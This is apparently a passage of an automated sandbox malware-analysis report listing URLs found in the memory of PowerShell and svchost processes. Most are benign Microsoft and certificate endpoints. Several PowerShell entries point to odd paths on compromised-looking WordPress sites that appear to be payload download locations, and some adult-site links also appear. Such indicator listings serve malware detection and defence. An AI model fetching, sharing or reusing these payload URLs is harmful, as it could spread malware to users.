              Source: powershell.exe, 00000004.00000002.289246816.0000018A15355000.00000004.00000001.sdmpString found in binary or memory: http://cps.letsencrypt.org0
              Source: powershell.exe, 00000004.00000002.289246816.0000018A15355000.00000004.00000001.sdmpString found in binary or memory: http://cps.root-x1.letsencrypt.org0
              Source: powershell.exe, 00000004.00000003.278015248.0000018A2C0E9000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
              Source: powershell.exe, 00000004.00000002.289246816.0000018A15355000.00000004.00000001.sdmpString found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
              Source: powershell.exe, 00000004.00000003.212412335.0000018A123DE000.00000004.00000001.sdmpString found in binary or memory: http://crl.micr
              Source: svchost.exe, 00000008.00000002.471574815.000001607CA0C000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
              Source: powershell.exe, 00000004.00000002.289286993.0000018A153A0000.00000004.00000001.sdmpString found in binary or memory: http://d-cem.com
              Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmpString found in binary or memory: http://fonts.googleapis.com/css?family=Work
              Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmpString found in binary or memory: http://html5shim.googlecode.com/svn/trunk/html5.js
              Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmpString found in binary or memory: http://ketoresetme.com
              Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmpString found in binary or memory: http://ketoresetme.com/wp-content/plugins/cookie-law-info/public/css/cookie-law-info-gdpr.css?ver=1.
              Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmpString found in binary or memory: http://ketoresetme.com/wp-content/plugins/cookie-law-info/public/css/cookie-law-info-public.css?ver=
              Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmpString found in binary or memory: http://ketoresetme.com/wp-content/plugins/cookie-law-info/public/js/cookie-law-info-public.js?ver=1.
              Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmpString found in binary or memory: http://ketoresetme.com/wp-content/plugins/woocommerce/assets/css/woocommerce-layout.css?ver=4.5.1
              Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmpString found in binary or memory: http://ketoresetme.com/wp-content/plugins/woocommerce/assets/css/woocommerce-smallscreen.css?ver=4.5
              Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmpString found in binary or memory: http://ketoresetme.com/wp-content/plugins/woocommerce/assets/css/woocommerce.css?ver=4.5.1
              Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmpString found in binary or memory: http://ketoresetme.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/style.css?ve
              Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmpString found in binary or memory: http://ketoresetme.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/vendors-styl
              Source: powershell.exe, 00000004.00000002.289021787.0000018A1517E000.00000004.00000001.sdmpString found in binary or memory: http://ketoresetme.com/wp-content/pmJ/
              Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmpString found in binary or memory: http://ketoresetme.com/wp-content/themes/Newspaper/images/icons/ico-video-large.png
              Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmpString found in binary or memory: http://ketoresetme.com/wp-content/themes/Newspaper/images/icons/video-small.png
              Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmpString found in binary or memory: http://ketoresetme.com/wp-content/themes/Newspaper/includes/demos/lifestyle/demo_style.css?ver=8.1
              Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmpString found in binary or memory: http://ketoresetme.com/wp-content/themes/Newspaper/style-woocommerce.css?ver=8.1
              Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmpString found in binary or memory: http://ketoresetme.com/wp-content/themes/Newspaper/style.css?ver=8.1
              Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmpString found in binary or memory: http://ketoresetme.com/wp-includes/css/dist/block-library/style.min.css?ver=5.5.3
              Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmpString found in binary or memory: http://ketoresetme.com/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp
              Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmpString found in binary or memory: http://ketoresetme.com/wp-includes/wlwmanifest.xml
              Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmpString found in binary or memory: http://ketoresetme.com/xmlrpc.php
              Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmpString found in binary or memory: http://ketoresetme.comx
              Source: powershell.exe, 00000004.00000002.290367412.0000018A24216000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: svchost.exe, 00000008.00000002.471574815.000001607CA0C000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
              Source: svchost.exe, 00000008.00000002.471574815.000001607CA0C000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.msocsp.com0
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
              Source: powershell.exe, 00000004.00000002.281715020.0000018A14283000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000004.00000002.289246816.0000018A15355000.00000004.00000001.sdmpString found in binary or memory: http://r3.i.lencr.org/0
              Source: powershell.exe, 00000004.00000003.278161412.0000018A2C142000.00000004.00000001.sdmpString found in binary or memory: http://r3.i.lencr.org/0#
              Source: powershell.exe, 00000004.00000002.289246816.0000018A15355000.00000004.00000001.sdmpString found in binary or memory: http://r3.o.lencr.org0
              Source: powershell.exe, 00000004.00000002.289246816.0000018A15355000.00000004.00000001.sdmpString found in binary or memory: http://rycomputer.com
              Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmpString found in binary or memory: http://schema.org/WebPage
              Source: svchost.exe, 00000008.00000002.471334775.000001607C850000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
              Source: powershell.exe, 00000004.00000002.281319093.0000018A14071000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000004.00000002.289021787.0000018A1517E000.00000004.00000001.sdmpString found in binary or memory: http://thebestfikrah.com/wp-admin/fOIlVX/
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
              Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmpString found in binary or memory: http://wheelcomoving.com
              Source: powershell.exe, 00000004.00000002.289021787.0000018A1517E000.00000004.00000001.sdmpString found in binary or memory: http://wheelcomoving.com/p/RuMeRPa/
              Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmpString found in binary or memory: http://wheelcomoving.com/wp-content/plugins/bt_cost_calculator/cc.main.js?ver=5.6
              Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmpString found in binary or memory: http://wheelcomoving.com/wp-content/plugins/bt_cost_calculator/jquery.dd.js?ver=5.6
              Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmpString found in binary or memory: http://wheelcomoving.com/wp-content/plugins/bt_cost_calculator/style.min.css?ver=5.6
              Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmpString found in binary or memory: http://wheelcomoving.com/wp-content/plugins/cargo/bt_elements.js?ver=5.6
              Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmpString found in binary or memory: http://wheelcomoving.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.3.2
              Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmpString found in binary or memory: http://wheelcomoving.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.3.2
              Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmpString found in binary or memory: http://wheelcomoving.com/wp-content/plugins/wpcargo/admin/assets/css/jquery.datetimepicker.min.css?v
              Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmpString found in binary or memory: http://wheelcomoving.com/wp-content/plugins/wpcargo/admin/assets/js/jquery.datetimepicker.full.min.j
              Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmpString found in binary or memory: http://wheelcomoving.com/wp-content/plugins/wpcargo/assets/css/fontawesome.min.css?ver=6.7.4
              Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmpString found in binary or memory: http://wheelcomoving.com/wp-content/plugins/wpcargo/assets/css/main.min.css?ver=6.7.4
              Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmpString found in binary or memory: http://wheelcomoving.com/wp-content/plugins/wpcargo/assets/css/wpcargo-style.css?ver=6.7.4
              Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmpString found in binary or memory: http://wheelcomoving.com/wp-content/plugins/wpcargo/assets/js/wpcargo.js?ver=6.7.4
              Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmpString found in binary or memory: http://wheelcomoving.com/wp-content/themes/cargo
              Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmpString found in binary or memory: http://wheelcomoving.com/wp-content/themes/cargo/gfx/plug.png);
              Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmpString found in binary or memory: http://wheelcomoving.com/wp-content/themes/cargo/js/dir.hover.js?ver=5.6
              Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmpString found in binary or memory: http://wheelcomoving.com/wp-content/themes/cargo/js/fancySelect.js?ver=5.6
              Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmpString found in binary or memory: http://wheelcomoving.com/wp-content/themes/cargo/js/header.misc.js?ver=5.6
              Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmpString found in binary or memory: http://wheelcomoving.com/wp-content/themes/cargo/js/jquery.magnific-popup.min.js?ver=5.6
              Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmpString found in binary or memory: http://wheelcomoving.com/wp-content/themes/cargo/js/misc.js?ver=5.6
              Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmpString found in binary or memory: http://wheelcomoving.com/wp-content/themes/cargo/js/slick.min.js?ver=5.6
              Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmpString found in binary or memory: http://wheelcomoving.com/wp-content/themes/cargo/js/sliders.js?ver=5.6
              Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmpString found in binary or memory: http://wheelcomoving.com/wp-content/themes/cargo/style.css?ver=5.6
              Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmpString found in binary or memory: http://wheelcomoving.com/wp-includes/css/dist/block-library/style.min.css?ver=5.6
              Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmpString found in binary or memory: http://wheelcomoving.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2
              Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmpString found in binary or memory: http://wheelcomoving.com/wp-includes/js/jquery/jquery.min.js?ver=3.5.1
              Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmpString found in binary or memory: http://wheelcomoving.com/wp-includes/js/wp-embed.min.js?ver=5.6
              Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmpString found in binary or memory: http://wheelcomoving.com/wp-includes/wlwmanifest.xml
              Source: powershell.exe, 00000004.00000002.289110750.0000018A1525D000.00000004.00000001.sdmpString found in binary or memory: http://wheelcomoving.comx
              Source: powershell.exe, 00000004.00000002.281715020.0000018A14283000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: svchost.exe, 00000011.00000002.308233755.000001E8C7413000.00000004.00000001.sdmpString found in binary or memory: http://www.bingmapsportal.com
              Source: svchost.exe, 0000000F.00000002.470100383.000001DF15642000.00000004.00000001.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
              Source: svchost.exe, 0000000F.00000002.470100383.000001DF15642000.00000004.00000001.sdmpString found in binary or memory: https://%s.xboxlive.com
              Source: svchost.exe, 0000000F.00000002.470100383.000001DF15642000.00000004.00000001.sdmpString found in binary or memory: https://activity.windows.com
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
              Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmpString found in binary or memory: https://anybunny.mobi/
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: https://api.aadrm.com/
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: https://api.cortana.ai
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: https://api.diagnostics.office.com
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: https://api.microsoftstream.com/api/
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: https://api.office.net
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: https://api.onedrive.com
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
              Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmpString found in binary or memory: https://api.w.org/
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: https://apis.live.net/v5.0/
              Source: svchost.exe, 00000011.00000003.307923266.000001E8C745F000.00000004.00000001.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
              Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmpString found in binary or memory: https://arabysexy.mobi/
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: https://augloop.office.com
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: https://augloop.office.com/v2
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
              Source: svchost.exe, 0000000F.00000002.470100383.000001DF15642000.00000004.00000001.sdmpString found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: https://cdn.entity.
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: https://clients.config.office.net/
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
              Source: svchost.exe, 0000000F.00000002.470100383.000001DF15642000.00000004.00000001.sdmpString found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: https://config.edge.skype.com
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: https://contentstorage.omex.office.net/addinclassifier/officeentities
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: https://contentstorage.omex.office.net/addinclassifier/officeentitiesupdated
              Source: powershell.exe, 00000004.00000002.290367412.0000018A24216000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000004.00000002.290367412.0000018A24216000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000004.00000002.290367412.0000018A24216000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: https://cortana.ai
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: https://cortana.ai/api
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: https://cr.office.com
              Source: powershell.exe, 00000004.00000002.289286993.0000018A153A0000.00000004.00000001.sdmpString found in binary or memory: https://d-cem.com
              Source: powershell.exe, 00000004.00000002.289021787.0000018A1517E000.00000004.00000001.sdmpString found in binary or memory: https://d-cem.com/wp-admin/JSLwG1/
              Source: powershell.exe, 00000004.00000002.289286993.0000018A153A0000.00000004.00000001.sdmpString found in binary or memory: https://d-cem.comx
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: https://dataservice.o365filtering.com
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: https://dataservice.o365filtering.com/
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: https://dev.cortana.ai
              Source: svchost.exe, 00000011.00000003.307969498.000001E8C745A000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
              Source: svchost.exe, 00000011.00000003.307923266.000001E8C745F000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
              Source: svchost.exe, 00000011.00000002.308260123.000001E8C743D000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
              Source: svchost.exe, 00000011.00000003.307923266.000001E8C745F000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
              Source: svchost.exe, 00000011.00000002.308278437.000001E8C744E000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
              Source: svchost.exe, 00000011.00000002.308260123.000001E8C743D000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
              Source: svchost.exe, 00000011.00000003.307923266.000001E8C745F000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
              Source: svchost.exe, 00000011.00000003.307923266.000001E8C745F000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
              Source: svchost.exe, 00000011.00000003.307923266.000001E8C745F000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
              Source: svchost.exe, 00000011.00000002.308266582.000001E8C7442000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
              Source: svchost.exe, 00000011.00000002.308266582.000001E8C7442000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
              Source: svchost.exe, 00000011.00000003.307923266.000001E8C745F000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
              Source: svchost.exe, 00000011.00000003.307969498.000001E8C745A000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: https://devnull.onenote.com
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: https://directory.services.
              Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmpString found in binary or memory: https://dirtyindianporn.info/
              Source: svchost.exe, 00000011.00000003.307969498.000001E8C745A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
              Source: svchost.exe, 00000011.00000003.307969498.000001E8C745A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
              Source: svchost.exe, 00000011.00000003.307969498.000001E8C745A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
              Source: svchost.exe, 00000011.00000002.308278437.000001E8C744E000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.307969498.000001E8C745A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t
              Source: svchost.exe, 00000011.00000003.307923266.000001E8C745F000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
              Source: svchost.exe, 00000011.00000002.308260123.000001E8C743D000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
              Source: svchost.exe, 00000011.00000003.286166612.000001E8C7432000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
              Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Raleway%3A100%2C200%2C300%2C400%2C500%2C600%2C700%2C800%2C90
              Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmpString found in binary or memory: https://freejavporn.mobi/
              Source: powershell.exe, 00000004.00000002.281715020.0000018A14283000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
              Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmpString found in binary or memory: https://go-indian.pro/
              Source: powershell.exe, 00000004.00000002.289836122.0000018A15796000.00000004.00000001.sdmpString found in binary or memory: https://go.micro
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: https://graph.ppe.windows.net
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: https://graph.ppe.windows.net/
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: https://graph.windows.net
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: https://graph.windows.net/
              Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmpString found in binary or memory: https://hindiporn.pro/
              Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmpString found in binary or memory: https://hotindianporn.mobi/
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&amp;premium=1
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&amp;premium=1
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&amp;premium=1
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: https://incidents.diagnostics.office.com
              Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
              Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmpString found in binary or memory: https://indianpornmovies.info/
              Source: 6CAFC0F8-7648-4F12-BE38-DAA858